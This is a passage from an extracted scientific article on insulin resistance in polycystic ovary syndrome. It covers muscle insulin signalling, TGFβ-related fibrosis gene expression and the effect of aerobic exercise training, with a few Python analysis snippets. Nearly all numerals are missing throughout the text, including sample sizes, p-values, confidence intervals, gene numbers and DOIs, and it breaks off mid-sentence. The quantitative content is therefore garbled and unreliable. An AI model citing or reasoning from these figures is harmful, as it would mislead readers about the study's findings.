koutsari c, ali ah, mundi ms & jensen md. storage of circulating free fatty acid in adipose tissue of postabsorptive humans: quantitative measures and implications for body fat distribution. diabetes – . (https://doi.org/ . /db - )
rask-andersen m, karlsson t, ek we & johansson Å. genome-wide association study of body fat distribution identifies adiposity loci and sex-specific genetic effects. nature communications . (https://doi.org/ . /s - - - )
yano y, vongpatanasin w, ayers c, turer a, chandra a, carnethon mr, greenland p, de lemos ja & neeland ij. regional fat distribution and blood pressure level and variability: the dallas heart study. hypertension – . (https://doi.org/ . /hypertensionaha. . )
lee m, choh ac, demerath ew, towne b, siervogel rm & czerwinski sa. associations between trunk, leg and total body adiposity with arterial stiffness. american journal of hypertension – . (https://doi.org/ . /ajh. . )
ebbert jo & jensen md. fat depots, free fatty acids, and dyslipidemia. nutrients – . (https://doi.org/ . /nu )
pinnick ke, neville mj, fielding ba, frayn kn, karpe f & hodson l. gluteofemoral adipose tissue plays a major role in production of the lipokine palmitoleate in humans. diabetes – . (https://doi.org/ . /db - )
antony b, jones g, stannus o, blizzard l & ding c. body fat predicts an increase and limb muscle strength predicts a decrease in leptin in older adults over . years. clinical endocrinology – . (https://doi.org/ . /cen. )

received in final form september; accepted september; accepted preprint published online september.

research

exercise and insulin resistance in pcos: muscle insulin signalling and fibrosis

n k stepto*, d hiam*, m gibson-helm, s cassar, c l harrison, s k hutchison, a e joham, b j canny, a moreno-asso, b j strauss, n hatzirodos, r j rodgers and h j teede

institute for health and sport, victoria university, melbourne, victoria, australia
monash centre for health research and implementation, monash university, clayton, victoria, australia
australian institute for musculoskeletal science, victoria university, melbourne, victoria, australia
medicine-western health, faculty of medicine, dentistry and health science, melbourne university, melbourne, victoria, australia
school of medicine, university of tasmania, hobart, tasmania, australia
department of medicine, school of clinical sciences, monash university, clayton, victoria, australia
division of diabetes, endocrinology & gastroenterology, school of medical sciences, faculty of biology, medicine and health, the university of manchester, manchester, uk
the robinson research institute, school of medicine, the university of adelaide, adelaide, australia
diabetes and endocrine units, monash health, clayton, victoria, australia

correspondence should be addressed to d hiam: danielle.hiam@vu.edu.au
*(n k stepto and d hiam contributed equally to this work)

abstract
objective: mechanisms of insulin resistance in polycystic ovary syndrome (pcos) remain ill defined, contributing to sub-optimal therapies. recognising that skeletal muscle plays a key role in glucose homeostasis, we investigated early insulin signalling and its association with aberrant transforming growth factor β (tgfβ)-regulated tissue fibrosis. we also explored the impact of aerobic exercise on these molecular pathways.
methods: a secondary analysis from a cross-sectional study was undertaken in women with (n = ) or without (n = ) pcos across lean and overweight bmis. a subset of participants with (n = ) or without (n = ) pcos who were overweight completed weeks of aerobic exercise training. muscle was sampled before and min into a euglycaemic-hyperinsulinaemic clamp, pre and post training.
results: we found reduced signalling in pcos of mechanistic target of rapamycin (mtor). exercise training augmented but did not completely rescue this signalling defect in women with pcos. genes in the tgfβ signalling network were upregulated in skeletal muscle in the overweight women with pcos but were unresponsive to exercise training except for genes encoding lox and collagens.
conclusions: we provide new insights into defects in early insulin signalling, tissue fibrosis and hyperandrogenism in pcos-specific insulin resistance in lean and overweight women. pcos-specific insulin signalling defects were isolated to mtor, while gene expression implicated tgfβ ligand-regulated fibrosis in the pcos-obesity synergy in insulin resistance and altered responses to exercise. interestingly, there was little evidence for hyperandrogenism as a mechanism for insulin resistance.

key words: mechanistic target of rapamycin (mtor); typical and atypical protein kinase c; transforming growth factor β receptor (tgfbrii); collagen; treadmill exercise training; high intensity interval training; hyperandrogenism

introduction
polycystic ovary syndrome (pcos) affects – % of women of reproductive age ( ) and has major metabolic (increased type 2 diabetes mellitus (t2d) and cardiovascular risk factors) ( , , ), reproductive (leading cause of anovulatory infertility) ( , ) and psychological (anxiety and depression) ( ) impacts, representing a substantial health burden. despite its high prevalence, the aetiology and ideal therapies for pcos remain unclear ( ). insulin resistance is a central characteristic ( , ), driving both hyperandrogenism and clinical features. the risk of t2d in pcos is increased . -fold independent of bmi ( , , ), accounting for % of t2d in young women ( ); yet the underlying mechanisms of insulin resistance in pcos remain ill defined ( , ). therapeutic strategies in pcos include medical therapy (metformin) and weight management via diet and exercise ( , , ), which reduce but do not reverse insulin resistance and fail to optimally treat pcos. in this context, greater insight into the aetiology of insulin resistance in pcos is needed. based on euglycaemic-hyperinsulinaemic clamp data, insulin resistance has been reported in up to % of women with pcos diagnosed by the rotterdam criteria ( ). pcos involves a unique, pcos-related insulin resistance (intrinsic insulin resistance), as % of lean women with pcos are insulin resistant compared with lean women without pcos. this insulin resistance is exacerbated by obesity (extrinsic insulin resistance ( , , )).
intrinsic insulin resistance in pcos is likely due to a dysfunctional response to insulin in metabolically active peripheral tissues including adipose tissue and skeletal muscle ( , ). as skeletal muscle accounts for – % of insulin-stimulated glucose uptake ( ), defects in this tissue may have profound effects on whole-body insulin sensitivity. reduced insulin sensitivity in skeletal muscle has well-established mechanisms including defective insulin signalling ( , ), with reduced activation of key signalling proteins such as insulin receptor substrate (irs) / , protein kinase b (pkb)/akt and its downstream substrate akt substrate kda (as ) ( , , ). while similar defects in insulin-stimulated signalling have been found in women with pcos ( , ), these signalling defects are not consistent ( ) and are unable to explain the pcos-specific insulin resistance. raja-khan et al. ( ) have proposed an alternative hypothesis that dysfunctional transforming growth factor β (tgfβ) signalling, regulated by fibrillins and latent tgfβ-binding proteins, may lead to increased organ stroma or fibrosis. this may predispose women with pcos to morbidities like insulin resistance, as tgfβ can directly impact glucose uptake and insulin signalling ( , , ) and/or create a physical barrier to glucose uptake into muscle ( ). the role of aberrant extracellular matrix (ecm) remodelling or tissue fibrosis and tgfβ in the aetiology of pcos-related insulin resistance has not been investigated. we therefore hypothesised that women with pcos, compared with bmi-matched controls, would show unique defects in insulin signal transduction and altered ecm and tgfβ signalling network gene expression. we aimed to examine the activation/phosphorylation of proteins in both the proximal and distal parts of the insulin signalling cascade before and min into a euglycaemic-hyperinsulinaemic insulin clamp, and gene expression of the ecm and tgfβ ligand signalling network, in women with or without pcos (spanning lean and obese bmis). our secondary aim was to investigate the impact of exercise training on the aberrant skeletal muscle insulin signalling and gene expression of the ecm and tgfβ ligand signalling network.

materials and methods

participants
the participants included in this secondary analysis are a subset of women who participated in our previously published studies ( , , , ) and consented to muscle biopsies. specifically, we included fifty-nine (fig. and table ) of the original cohort of premenopausal women with or without pcos. the women were categorised according to pcos status and matched (group means) for bmi, generating four groups: (i) lean with pcos (lp), (ii) lean without pcos (control; lc), (iii) overweight to obese with pcos (owp) and (iv) overweight to obese without pcos (control; owc). confirmation of pcos diagnosis was undertaken by expert endocrinologists (skh, aej and hjt) based on the rotterdam criteria. the southern health research advisory and ethics committee approved the study and participants gave written informed consent. the clinical trial registration number is isrctn .

study design
for this ancillary mechanistic observational study and interventional sub-study (fig. ) data were collected
at baseline in all women (after a three-month washout of relevant medications) and following weeks of exercise training (subgroup of women with overweight/obesity, n = per group). data were collected in the follicular phase of the menstrual cycle in control women and, wherever feasible, in the women with pcos. end-point analyses were done by staff blinded to group and intervention stage.

exercise intervention
the subgroup of overweight to obese participants, consisting of women with pcos (n = ) and without pcos (controls; n = ), undertook weeks of supervised, personalised, progressive aerobic exercise training on a motorised treadmill as described previously. briefly, participants attended three h sessions each week, which sequentially alternated between moderate-intensity exercise (walking or jogging at % of vo2 peak or – % hrmax) and high-intensity interval training (six -min intervals with -min recovery periods at approximately – % of vo2 peak or approximately – % hrmax). the intensity and/or duration of each participant's exercise session were individually progressed and increased over the duration of the intervention ( , , ).

clinical and biochemical measurements
participants were assessed for anthropometric measures including body weight, height, body composition, abdominal visceral and subcutaneous fat, and waist and hip circumference, as reported in table . insulin sensitivity was determined using the euglycaemic-hyperinsulinaemic clamp technique ( mu/m2/min) as previously reported ( ). blood samples were batch analysed for fasting glucose, total cholesterol, high-density lipoprotein cholesterol, low-density lipoprotein cholesterol, triglycerides, insulin, testosterone and hba1c. low-density lipoprotein cholesterol and the homeostatic model assessment of insulin resistance (homa) were calculated ( ). thigh muscle (vastus lateralis) samples were obtained by percutaneous biopsy under local anaesthesia ( ) immediately prior to and min into the insulin clamp. muscle biopsies were immediately frozen in liquid nitrogen and then stored at − °c for subsequent analysis.

figure: consort flow diagram detailing the sample size and prior research studies for the secondary analysis reported in the current study.

table: participant characteristics and the impact of weeks of aerobic exercise training on the two overweight groups of women. columns: lc, lp, owc, owp, owc pre-training, owc post-training, owp pre-training, owp post-training. rows: participants per group (n); age (y); bmi (kg/m2); whr; dxa body fat (%) and fat mass (kg); ct abdominal scf and abdominal vf; glucose homeostasis (fbg (mmol/l), fasting plasma insulin (pmol/l), clamp plasma insulin (pmol/l), homa-ir, gir (mg/min/m2)); lipid profiles (cholesterol (mmol/l), triglycerides (mmol/l), ldl/hdl); androgens (testosterone (pmol/l), shbg (mmol/l), fai (%)); fitness (vo2 peak (ml/kg/min)); pcos diagnosis (nih participants (n), rotterdam participants (n)). data are from the subset of women included in this ancillary analysis ( , ) and are presented as mean ± s.d. or, where data were log transformed, as a back-transformed mean (± s.d. as a cv %). statistical differences are reported between groups (lc, lp, owc and owp) after adjusting for age, meeting both p < . and clear effects at the % ci: a, significantly different from overweight controls; b, significantly different from overweight pcos; c, significantly different from lean pcos. for the training sub-group: d and e, significantly different from pre-training; f, significantly different change between groups; g, trend for difference from pre-training; h and i, significantly different from pcos (untrained values); j, number of participants meeting nih diagnostic criteria; k, number of participants meeting rotterdam diagnostic criteria. bmi, body mass index; ct, computed tomography; dxa, dual x-ray absorptiometry; fai, free androgen index; gir, glucose infusion rate (clamp); hdl, high-density lipoprotein; homa-ir, homeostasis model of insulin resistance ( ); lc, lean control; ldl, low-density lipoprotein; lp, lean pcos; n/a, not applicable; owc, overweight control; owp, overweight pcos; scf, subcutaneous fat; shbg, steroid hormone-binding globulin; vf, visceral fat; whr, waist-to-hip ratio.

muscle protein extraction and western blot analyses
equal quantities of protein, extracted as previously reported ( , , ), were resolved by sds-page (bio-rad, criterion tgx gels), transferred to pvdf membranes (bio-rad, turbo-blot) using optimised protocols, blocked with tbst ( mm tris; % tween ) containing % skim milk, washed times for min in tbst and immunoblotted overnight at °c with primary antibodies ( , , ) targeting total and phospho-proteins including glucose transporter (glut ), insulin receptor (ir), insulin receptor substrate (irs- ), protein kinase b/akt, akt substrate kda (as ), typical and atypical phospho-protein kinase c (pkcδ/θ; pkcλ/ζ), mechanistic target of rapamycin (mtor), glycogen synthase kinase α (gsk) and glyceraldehyde phosphate dehydrogenase (gapdh) as the loading control (supplementary table , see section on supplementary materials given at the end of this article). after washing and incubation with horseradish peroxidase-conjugated secondary antibody (perkin elmer) in % skim milk and tbst, the immune-reactive proteins were detected with enhanced chemiluminescence (amersham biosciences) on the versadoc mp (bio-rad) and quantified by densitometry (quantity-one; bio-rad). all phospho-protein data were normalised to their total protein, unless otherwise indicated (figs , and supplementary figs , ), to control for loading variability.

rna extraction and tgfβ network/tissue fibrosis gene expression analysis
total rna was isolated from the muscle ( – mg) using trizol and cleaned up with rneasy total rna kit columns (qiagen). total rna content and purity were established by measuring absorbance at and nm (nanodrop; eppendorf). ten micrograms of each rna sample were then dnase treated using dnase (thermo fisher scientific), as described in detail in ( ). relative gene expression was quantified by real-time pcr using the qiagen rt custom profiler array for fibrosis pathway-related genes. ng of dnase-treated rna was used for cdna, diluted in and amplified for genes plus housekeeping genes. cdna was generated according to the manufacturer's guidelines with modifications ( ) using µl of superscript rt iii (thermo fisher scientific). custom array primers were designed against the human mrna sequences for the corresponding genes in the ref seq database (supplementary table ).
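the custom-array data described here are normalised with the comparative ct (Δct) method, subtracting the mean ct of the gapdh and actb housekeeping genes from the ct of each gene of interest and converting to the linear scale as 2^−Δct (detailed in the following paragraph). purely as an illustration of that calculation, the python sketch below uses made-up ct values; none of the numbers are data from the study.

import numpy as np

# hypothetical cycle-threshold (ct) values for one sample
ct_gene = 27.4                    # gene of interest, e.g. a collagen transcript
ct_gapdh, ct_actb = 18.9, 19.3    # housekeeping genes

# delta-ct: gene of interest minus the mean of the housekeeping genes
delta_ct = ct_gene - np.mean([ct_gapdh, ct_actb])

# relative expression on the linear scale
rel_expr = 2.0 ** (-delta_ct)
print(f"delta-ct = {delta_ct:.2f}, relative expression = {rel_expr:.2e}")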
all reactions were performed according to the sybr-green™ cycle threshold (ct) method using a bio-rad cfx real-time pcr detection system. thermocycling conditions for the pcr included min at °c followed by cycles of s at °c and min at °c. melt curve analysis from to °c ( s per °c) was performed to ensure a single defined peak for each amplified product. comparative ct calculations for gene expression were performed by subtracting the mean gapdh and actb ct values from the ct values of the gene of interest to derive a Δct value. the expression of the genes was then calculated according to the formula 2^−Δct.

statistical analysis
all statistical analyses were conducted using mixed modelling procedures (proc mixed) in the statistical analysis system (version . , sas institute). data, unless otherwise stated, were log transformed before analysis to overcome heteroscedasticity and are presented as a back-transformed mean with standard deviation (s.d.) as a coefficient of variation (cv; %). for the cross-sectional study, separate models were generated to compare between-group differences in variables including participant characteristics and gene expression, where the fixed effects in the model estimated the main effects of pcos (pcos/control) and obesity status (bmi: lean (< kg/m2) and overweight (> kg/m2), as per ( )) as nominal variables, with the modifying effect of age as a linear numeric variable. to estimate the main effects of pcos and bmi on the fold change (with an s.d. expressed as cv %) in normalised protein phosphorylation induced by min of insulin infusion, the fixed effects were again pcos and bmi status as nominal variables, interacted with baseline phosphorylation levels, age and the change in plasma insulin concentrations (linear numeric variables). for the exercise training sub-study, a similar approach was adopted, and the main effects of pcos (pcos/control) and training status (untrained vs trained) on participant characteristics, gene expression, baseline protein abundance and insulin-induced changes in phospho-protein abundance were determined with pcos and training status as nominal fixed effects, interacted with the dependent variable's baseline value. all models estimated between-group differences in variables, or changes in variables, as a percentage and presented them with % confidence intervals ( % ci). pearson correlations (proc corr; sas v . ) were used to explore relations between gir and a select number of variables. significance was accepted when p < . . as an a priori decision, we ran a parallel analysis on our mixed model outcomes using a bayesian method that has no or minimally informed prior belief about the effects or standard deviations, or magnitude-based inferences ( , ). this method allowed us to make probabilistic assertions about the true magnitudes of effects using the non-clinical version of magnitude-based inference, according to which an effect was deemed unclear if the % ci spanned substantial positive and negative values of the smallest worthwhile effect ( .
times the between-participant s.d.); all other effects were deemed clear and assigned the magnitude of the analysed effect, along with the chances that the effect was substantial and/or trivial ( ). the magnitude-based inference component of our combined statistical approach was used to provide a standardised effect size (< . , trivial; . – . , small; . – . , moderate; . – , large) and to account for inflation of error arising from the large number of comparisons investigated. we only reported effects that met our significance criteria (p < . ) and were deemed to have a clear standardised effect by magnitude-based inference for the % ci of the analysed effect.

results
all clinical data differentiating the groups of women in the subset of participants used in this analysis, and the beneficial impact of exercise training, are detailed in table . between-group differences for insulin-stimulated phosphorylation, signalling protein abundance and gene expression are reported as fold changes with % ci that include the adjustments for the appropriate covariates.

insulin signalling
the abundance of key phospho-proteins across the proximal and distal components of the insulin signalling pathway, as well as insulin signalling pathway regulators, was analysed across the four groups of women to identify early insulin signalling defects in skeletal muscle that align with pcos-specific insulin resistance (fig. and supplementary fig. ).

figure: normalised fold change of insulin-stimulated ( min) phosphorylation of key proteins in the insulin signalling pathway and insulin signalling pathway regulators. (a) insulin receptor (ir), (b) insulin receptor substrate serine (irs ), (c) protein kinase b/akt serine (akt), (d) akt threonine , (e) atypical protein kinase c (pkc (ζ/λ)), (f) typical pkc (δ/θ), (g) mechanistic target of rapamycin (mtor), (h) akt substrate kda (as ), (i) glycogen synthase kinase ser / . covariate-adjusted statistical differences reported as: *significant fold increase with insulin stimulation, p < . (and clear effect at % cl); **significant fold increase with insulin stimulation, p < . (and clear effect at % cl); p, significant impact of pcos, p < . (and clear effect at % cl); o, significant impact of obesity, p < . (and clear effect at % cl). presented as mean ± s.d. (data presented as back-transformed, with the s.d. derived as a coefficient of variation (%)), p < . .

overall, min of insulin infusion stimulated phosphorylation of the signalling proteins across all groups, where
taken together these data suggest altered insulin-sensitive metabolic signalling distal to akt which may impact the translocation of the glucose transporter protein glut and therefore glucose uptake into muscles. we found no differences in protein expression of glut between the groups (data not shown). gene expression for tissue fibrosis the relative gene expression of col a , col a , dcn, igf , lox, ltbp , tgfb and tgfbr was impacted by both obesity and/or pcos status with small to moderate between-group differences (fig. ) suggesting aberrant signalling via the tgfβ ligand signalling network, establishing a pro-fibrotic gene program. specifically, col a and a were . fold ( % ci: . , . ; p = . ) and . fold ( % ci: . , . %; p = . ) higher in owp compared to owc. the owc group had higher ( . fold; p < . ) expression of both col a and a compared to lc. the ltbp gene expression was highest in the overweight groups, with owp having significantly higher ( . fold, % ci: . , . ; p = . ) expression than lc. for dcn ( . fold, % ci: . , . ; p = . ) and lox ( . fold % ci: . , . ; p = . ) the owp group had higher gene expression than owc. while dcn in lc was lower ( . fold, p = . ) and lox was . fold higher (p = . ) than owc. the tgfβ signalling-related gene expression was higher in the owp group where tgfb and tgfbr expression were . fold ( % ci: . , . ; p = . ) and . fold ( % ci: . , . , p = . ) higher in owp compared to lc respectively. tgfbr gene expression was . fold higher in owp vs owc (p = . ). in contrast, igf gene expression was lowest in owc being . fold ( % ci: . , . ; p = . ) compared to lc, with owc also being lower ( . fold % ci: . , . ; p = . ) than owp. overall gir negatively correlated with body composition (bmi; android, gynoid and visceral fat; and dxa-derived fat free mass and appendicular muscle mass) and fai (supplementary table ). in contrast, gir was positively correlated with aerobic fitness and shbg concentrations (supplementary table ). these overall associations were due to the stronger correlations observed in the women with pcos compared to controls across the bmi categories. gir was also positively correlated to the fold change in insulin-stimulated ( min) phospho- mtor (r = . , p = . ) in the pcos group only and negatively correlated to tgfbr gene expression overall (r = − . , p = . ). impact of exercise in the women (with overweight/obesity) who participated in the -week treadmill exercise intervention a number of changes in clinical features (table ), insulin signalling (fig. and supplementary fig. ) and tgfβ signalling network gene expression (fig. ) were observed. training- induced differential responses to min of insulin stimulation, where only phospho-aktser and phospho- gskser were impacted differently by the training intervention. owp demonstrated a small attenuation in phosphorylation of phospho-aktser ( . fold % ci: . , . ; p = . ) and phospho-gskser ( . fold % ci: , . ; p = . ) compared to owc women, respectively. surprisingly, very few phospho- proteins demonstrated clear with-in group impacts of training. specifically, training resulted in a large augmentation of insulin-stimulated phospho-as of . fold ( % ci: . , . ; p = . ) from pre- to post-training in owp. on the other hand, training resulted in a small attenuation of phospho-gskser ( . fold % ci: . , ; p = . ) from pre- to post-training in owp group. we also reported small to moderate differential training-induced changes in relative gene expression (fig. 
) of genes for ecm deposition, col a , col a , dcn and lox, which only occurred in owp women. col a gene expression increased by . fold ( % ci: . , . ; p = . ) from pre- to post-training in the owp women. similarly, exercise training induced col a and lox gene expression increases of . fold ( % ci: . , . ; p = . ) and . fold ( % ci: . , . ; p = . ), respectively. the exercise-induced changes in gir did not correlate with any fold changes in insulin-induced increases/decreases in protein phosphorylation or with changes in gene expression (supplementary table ) in any group. however, changes in fai were negatively correlated with the training-induced changes in gir (r = − . ; p = . ) in women with pcos, indicating that increased insulin sensitivity was associated with a decreased fai.

figure: relative gene expression of the tissue fibrosis (tgfβ) pathway. gene expression was normalised to the mean of gapdh and actb (the housekeeping genes) expression. (a) col a , (b) col a , (c) dcn, (d) igf , (e) lox, (f) smad , (g) tgf i , (h) ltbp , (i) tgfb , (j) tgfb , (k) tgfb , (l) tgfbr . these data are from a subset of women (n = ) ( ). covariate-adjusted statistical differences reported: a, significantly different from overweight control, p < . (and clear effect at % cl); b, significantly different from overweight pcos, p < . (and clear effect at % cl). data are presented as mean ± s.d. (data presented as back-transformed, with the s.d. derived as a coefficient of variation (%)).

figure: normalised fold change of insulin-stimulated ( min) phosphorylation of key proteins in the insulin signalling pathway before and after weeks of intensified aerobic exercise training in overweight women with and without pcos. (a) insulin receptor (ir), (b) insulin receptor substrate serine (irs ), (c) protein kinase b/akt serine (akt), (d) akt threonine , (e) atypical protein kinase c (pkc (ζ/λ)), (f) typical pkc (δ/θ), (g) mechanistic target of rapamycin (mtor), (h) akt substrate kda (as ), (i) glycogen synthase kinase ser / . these data are from a subset of women (n = pcos, n = control) from ( , ). covariate-adjusted statistical differences reported as: *significant fold increase with insulin stimulation, p < . (and clear effect at % cl); **significant fold increase with insulin stimulation, p < . (and clear effect at % cl); a, significantly different between-group training response, p < . (and clear effect at % cl); b, significant within-group training response, p < . (and clear effect at % cl). presented as mean ± s.d. (data presented as back-transformed, with the s.d. derived as a coefficient of variation (%)).
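the covariate-adjusted fold changes reported in these results come from mixed models fitted to log-transformed data and back-transformed to fold changes, as described in the statistical analysis section. the sketch below illustrates that general workflow in python, with statsmodels standing in for sas proc mixed; the file name, column names (log_phospho, pcos, bmi_group, age, participant) and coding of the categorical variables are assumptions, and the model is deliberately simplified rather than a reproduction of the published analysis.

import numpy as np
import pandas as pd
import statsmodels.formula.api as smf

# hypothetical data: one row per participant per time point, with the
# insulin-stimulated phospho-protein signal already natural-log transformed
df = pd.read_csv("signalling.csv")

# mixed model: fixed effects for pcos and bmi group plus age as a covariate,
# random intercept per participant to handle repeated measures
model = smf.mixedlm("log_phospho ~ pcos * bmi_group + age",
                    data=df, groups=df["participant"])
fit = model.fit()
print(fit.summary())

# back-transform the pcos fixed effect from the log scale to a fold change
# (the parameter name assumes a pcos column coded as 'yes'/'no')
fold_change_pcos = np.exp(fit.params["pcos[T.yes]"])
print(f"pcos effect expressed as a fold change: {fold_change_pcos:.2f}")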
/ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle : discussion taking a novel sampling approach, this study demonstrated dysfunction in insulin signalling after min of insulin infusion during an insulin clamp in women with pcos across a range of bmis. this dysfunction was distal to akt/pkb and associated with end-clamp insulin sensitivity. specifically, reduced insulin stimulated phospho-mtor was associated with pcos and obesity status. a -week exercise intervention improved, but did not rescue insulin sensitivity in owp compared to owc women and these improvements were accompanied by augmented phospho-as and phospho-mtor (trend) but attenuated phospho-akt-ser and phosho- gskser / in pcos. we found genes in the tgfβ regulated tissue fibrosis pathway that encode ecm components (col a , col a ), enzymes in the collagen deposition and assembly (lox, dcn), ligands (tgfb ) and their receptor were elevated in owp. after the -week training intervention col a , col a , dcn and lox were differentially regulated in the owp compared to owc women. overall women with pcos, especially the owp showed a gene expression pattern conducive to greater tgfβ ligand-driven ecm or fibrosis, even after the exercise training intervention. defects in insulin signalling in skeletal muscle are well documented for insulin-resistant conditions ( ), including pcos ( , ). our data significantly expands this work exploring possible defects in both proximal and distal components of this pathway in lean and overweight controls and women with pcos. in agreement with the literature ( , , ) our data demonstrated an obesity-induced defect in the insulin receptor activation of signalling, due to differential phosphorylation of tyr / between the lean and overweight groups with no impact of pcos status. when obesity (bmi) and prevailing insulin concentrations were accounted for, the obesity-driven differences were negated and the lack of impact of pcos status remained (fig. ), as previously reported ( , ). our data allowed us to explore the hypothesis of diamanti-kandarakis and dunaif ( ) where there may be a pcos-specific serine kinase targeting irs / . mtor could be this kinase ( , ), however, our in vivo data contrast with this hypothesis as no insulin- stimulated change was detected in any group. these data suggest that signalling defects are more likely distal to the ir and irs / in skeletal muscle of women with pcos. a key finding of this study, was that our in vivo data show reduced phosphorylation of mtor occurred in pcos-specific manner and implicates this protein figure  training response of relative gene expression in the tissue fibrosis (tgfβ) pathway for women with and without pcos after weeks of intensified exercise training. (a) col a , (b) col a , (c) dcn, (d) igf , (e) lox, (f) smad , (g) tgf i , (h) ltbp , (i) tgfb , (j) tgfb , (k) tgfb , (l) tgfbr . these data are from a subset of women (n =  pcos, n =  control) from ( , ). presented as mean ± s.d. (data presented as back transformed and the s.d. was derived as a coefficient of variation (%)). covariate adjusted statistical difference reported: *significant within group training effect p <  . (and clear effect at %cl), asignificant difference between owc and owp p <  . (and clear effect at %cl). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . 
/ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle pb–xx : complex as a mechanism of insulin resistance in pcos (supplementary table ). these data differ from a recent study ( ) investigating insulin signalling defects in lean hyperandrogenic women with pcos, where defects in adenosine monophosphate kinase (ampk) and pyruvate dehydrogenase (pdh) activity explain insulin resistance. this work was not without limitations (e.g. lean women only, no fitness assessments ( )) and did not consider mtor, the alternate metabolic signalling pathway. mtor signalling via its complex mtorc (mtor + raptor) is associated with nutrition-regulated anabolic processes in skeletal muscle ( ). more recently the mtorc (mtor+rictor) has been linked to insulin resistance in skeletal muscle in vitro and animal models in the presence of reduced phospho-akt ser , altered intracellular glucose handling, irrespective of levels of phospho-akt-thr and glut vesical trafficking ( ). the women with pcos from the exercise training sub- group had improved, but not rescued mtor signalling responses to insulin, which did not correlate with training-induced changes in gir (supplementary table ). as we were unable to quantify the different mtor complexes, due to tissue availability, we could not establish if mtorc was associated with this pcos- specific reduction in insulin signalling and sensitivity. more research is needed to understand the pcos-specific mtor downregulation and its role in the intrinsic insulin resistance in skeletal muscle. as , gsk , typical pkc (δ/θ) and atypical pkc (λ/ξ) insulin-stimulated phosphorylation were surprisingly similar between groups but there were trends for obesity to reduce signalling. glut is considered important in skeletal muscle insulin and exercise stimulated glucose uptake ( ) where our data for protein expression of glut (data not shown) surprisingly found no differences between the four groups of women. while these data align with previous work suggesting comparable levels of glut between women with and without pcos ( ), our methodology (centrifuged muscle lysate and heating prior to gel separation) may mask/underestimate any true differences and effects. the -week exercise intervention clearly impacted the dysfunctional phosphorylation of three signalling proteins. specifically, phospho-as , a key protein in glut vesicle translocation ( ), was improved in the owp women, aligning with other training studies (in males ( )). on the other hand phospho- akt and –gsk (regulation of glycogen synthesis ( )) demonstrated contradictory reductions post-training in the owp women. this was unexpected, especially the reduced phospho-akt; however, there is the non-linearity of signalling via akt ( ) and thus limiting its impact on any training induced improvements of gir in owp. the training intervention did not induce significant changes in the other signalling proteins, each having a vital role in regulating insulin-stimulated glucose uptake either as downstream substrates of akt or independently including regulation of glut vesicle translocation (atypical pkc (λ/ξ) ( )) and integration lipid availability to reduce glucose uptake (typical pkc (δ/θ) ( , )). 
in summary, our data suggest that the reduced early activation of proteins below akt are linked to pcos–specific insulin resistance. this is despite the alteration but not normalisation of phosphorylation defects by training. overall, these data and that of others ( , ) suggests insulin signalling defects in skeletal muscle account for some insulin resistance, but additional molecular mechanisms are responsible for the pcos-specific insulin resistance and its synergy with obesity. there is emerging data suggesting that at least tgfβ is an exercise induced adipokine that promotes insulin sensitivity ( ). however, these data are currently biased to male samples and mainly rodent physiology but they do further support the notion that tgfβ pathways are important for insulin sensitivity and response to exercise. human data supporting ( , ) induction of insulin resistance provide a direct role of tgfβ signalling, via the smad proteins in skeletal muscle glucose uptake. in the context of the aetiology of pcos, our new hypothesis ( ) of tgfβ ligand mediated excess stromal deposition or fibrosis, may apply beyond the ovary to metabolic tissues like skeletal muscle in women with pcos, predisposing them to insulin resistance. dysfunctional tgfβ or tgfβ superfamily ligand signalling may be involved as anti-müllerian hormone (amh) ( ) and tgfβ ( ) are elevated in women with pcos. these ligands act via their respective receptors to activate the smad signalling proteins that are not only negative regulators of akt ( ) and mtor ( ), but are key signals in ecm deposition. thus, this pathway is a plausible contributor to dysfunctional insulin signalling and reduced sensitivity in pcos. our gene expression data of elevated collagen, ecm deposition enzymes and tgfβ r gene expression (pro-fibrotic gene profile), elevated ligands (amh ( ) and tgfβ ( )) and our previously reported high tissue density (elevated hounsfield units) in thigh skeletal muscle from ct analysis ( ), support the notion that tgfβ ligand signalling and tissue fibrosis may be involved in pcos-specific skeletal muscle insulin resistance ( ). this may occur not only via smad protein signalling interfering with akt this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle : and/or mtor signalling, but also via increased ecm possibly limiting insulin and glucose movement across the interstitial space. interestingly, exercise training had no effect on this network of genes except lox, col a and a where expression was augmented. this provides a possible mechanism for resistance to insulin sensitising therapies in pcos, which aligns with other research ( ) and warrants further investigation. therefore, our data support our hypothesis ( ) and allows us to expand our understanding of insulin resistance in skeletal muscle in pcos and its attenuated response to therapy. we now propose that the tgfβ ligand signalling via smad-mtor/smad-akt pathways plus tissue fibrosis is mechanistically involved in pcos-specific insulin resistance, its synergy with obesity (fig. ) and possible resistance to therapy. 
our study limitations included a small sample size ( , , ) due to the invasive procedures used to obtain tissue samples. as this was an ancillary analysis tissue availability was limited (additional analysis via immunoblotting of tgfβ signalling) and not collected to for immunohistochemistry. we acknowledge that the sample size was limited for the exercise arm of the study, which may have limited power to detect exercise- induced alterations in fibrosis in the owc group. alternatively, we could also speculate that perhaps on owc exercise does not re-model the ecm unlike the owp. however, the strengths of this work were the use of gold-standard methods to assess insulin sensitivity in a community-recruited, well-characterised population of lean and overweight women with or without pcos. we cannot rule out contributions of differential body composition and other systemic factors (supplementary tables and ) to insulin resistance in women with pcos. specifically, fai index correlated strongly (negatively) with end clamp gir in women with pcos but not controls, but were no longer significant when lp and owp were considered separately (r ~ − . , p > . ). additionally, exercise-induced reduction in fai correlated strongly with the increases in gir for the sub-group of pcos women. these data suggest a role of hyperandrogenism in pcos-specific ir. however, fai did not correlate with any insulin signalling or tgfβ and tissue fibrosis gene expression data in this study. fai is a calculated variable dependant on shbg concentrations, which are impacted by insulin resistance ( ). taken together with most literature ( , ) this study could not establish the role of hyperandrogenism in causing insulin resistance in pcos via peripheral tissue insulin signalling and fibrosis. conclusions our data provide new insights into pcos-specific insulin resistance and the associated early signalling events in skeletal muscle highlighting a role for aberrant mtor signalling. these data 